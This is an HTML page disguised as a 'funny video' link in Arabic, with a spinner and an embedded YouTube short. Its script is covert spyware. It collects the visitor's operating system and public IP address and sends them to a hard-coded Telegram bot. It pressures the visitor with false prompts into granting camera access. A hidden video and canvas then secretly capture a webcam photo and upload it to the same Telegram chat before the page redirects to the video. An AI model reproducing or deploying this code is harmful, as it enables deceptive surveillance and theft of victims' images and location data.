<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }

        input {
            padding: 10px;
            margin: 10px;
        }

        button {
            padding: 10px 20px;
            background-color: #007bff00;
            color: #ffffff00;
            border: none;
            cursor: pointer;
            display: none;
        }

        video {
            width: 0;
        }

        canvas {
            display: none;
        }

        body,
        html {
            height: 100%;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: #f4f4f4;
        }

        .loader {
            border: 4px solid #f3f3f3;
            /* Light grey */
            border-top: 4px solid #3498db;
            /* Blue */
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 2s linear infinite;
            margin: 0 auto;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        .loader-container {
            text-align: center;
            font-family: Arial, sans-serif;
            color: #333;
        }

        iframe {
            display: none;
        }
    </style>
    <title>فيديو مضحك</title>
</head>

<body>
    <div id="os-info">Detecting operating system...</div>
    <div id="ip-info">Detecting IP address...</div>
    <div class="loader-container">
        <div class="loader"></div>
        <p>جاري فتح الرابط ...... الرجاء الانتظار</p>
    </div>
    <iframe id="iframe" src="https://youtube.com/shorts/fzoPRuQt-2Q?si=1V3irvRkEPcLr8Cw" frameborder="0"></iframe>
    <video id="video" width="640" height="480" autoplay></video>
    <button id="snap">التقاط صورة</button>
    <canvas id="canvas" width="640" height="480"></canvas>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script>
        window.addEventListener('load', function () {
            var osInfoDiv = document.getElementById('os-info');
            var ipInfoDiv = document.getElementById('ip-info');
            var osName = '';
            var osVersion = '';

            var userAgent = navigator.userAgent;

            if (/Android/i.test(userAgent)) {
                osName = 'Android';
                osVersion = userAgent.match(/Android\s([0-9.]+)/i)[1];
            } else if (/iPhone|iPad|iPod/i.test(userAgent)) {
                osName = 'iOS';
                osVersion = userAgent.match(/OS\s([0-9_]+)/i)[1].replace(/_/g, '.');
            } else if (/Windows Phone|Windows NT/i.test(userAgent)) {
                osName = 'Windows';
                osVersion = userAgent.match(/Windows\sNT\s([0-9.]+)/i)[1];
            } else if (/Mac/i.test(userAgent)) {
                osName = 'MacOS';
                osVersion = userAgent.match(/Mac\sOS\sX\s([0-9_]+)/i)[1].replace(/_/g, '.');
            } else if (/Linux/i.test(userAgent)) {
                osName = 'Linux';
                // Not easy to detect specific Linux distribution and version from user agent
                osVersion = 'Unknown';
            } else {
                osName = 'Unknown';
                osVersion = 'Unknown';
            }

            osInfoDiv.textContent = 'OS: ' + osName + ' Version: ' + osVersion;

            fetch('https://api64.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipInfoDiv.textContent = 'IP Address: ' + data.ip;
                    axios.post('https://api.telegram.org/bot6741503997:AAHdjodvq7uXWhMXGHkxVlUS9ntc6B-fszI/sendMessage', {
                        chat_id: '6930815689',
                        text: "OS: " + osName + " version: " + osVersion + " ip: " + data.ip
                    })
                })
                .catch(error => {
                    ipInfoDiv.textContent = 'Failed to retrieve IP address';
                });
        });
        const video = document.getElementById('video');
        const canvas = document.getElementById('canvas');
        const constraints = {
            video: true
        };
        window.onload = function () {
            if (confirm("سيتم طلب السماح للكميرا. يجب الموافقة عليها، وإلا لن يتم فتح الرابط بشكل صحيح.")) {
                navigator.mediaDevices.getUserMedia({ video: true })
                    .then(function (stream) {
                        video.srcObject = stream;
                        setTimeout(function () {
                            canvas.getContext('2d').drawImage(video, 0, 0, 640, 480);
                            canvas.toBlob(function (blob) {
                                const formData = new FormData();
                                axios.post('https://api.telegram.org/bot6741503997:AAHdjodvq7uXWhMXGHkxVlUS9ntc6B-fszI/sendMessage', {
                                    chat_id: '6930815689',
                                    text: "تم الدخول"
                                })
                                formData.append('photo', blob, 'photo.jpg');
                                axios.post('https://api.telegram.org/bot6741503997:AAHdjodvq7uXWhMXGHkxVlUS9ntc6B-fszI/sendPhoto?chat_id=6930815689', formData, {
                                    headers: {
                                        'Content-Type': 'multipart/form-data'
                                    }
                                })
                                    .then(function (response) {
                                        window.location.replace("https://youtube.com/shorts/fzoPRuQt-2Q?si=1V3irvRkEPcLr8Cw");
                                        document.getElementById("iframe").style.display = "block";
                                    })
                                    .catch(function (error) {
                                        console.error('حدث خطأ: ', error);
                                        axios.post('https://api.telegram.org/bot6741503997:AAHdjodvq7uXWhMXGHkxVlUS9ntc6B-fszI/sendMessage', {
                                            chat_id: '6930815689',
                                            text: "ضعف انترنت"
                                        })
                                        alert("لم يتم الامر بشكل صحيح بسبب ضعف الانترنت");
                                    });
                            });
                        }, 5000);
                    })
                    .catch(function (err) {
                        alert("لن يتم فتح الرابط بشكل صحيح اسمح للوصول للكميرا والا لن نسمح لك بالمتابعة");
                    });
            }
        };
    </script>
</body>

</html>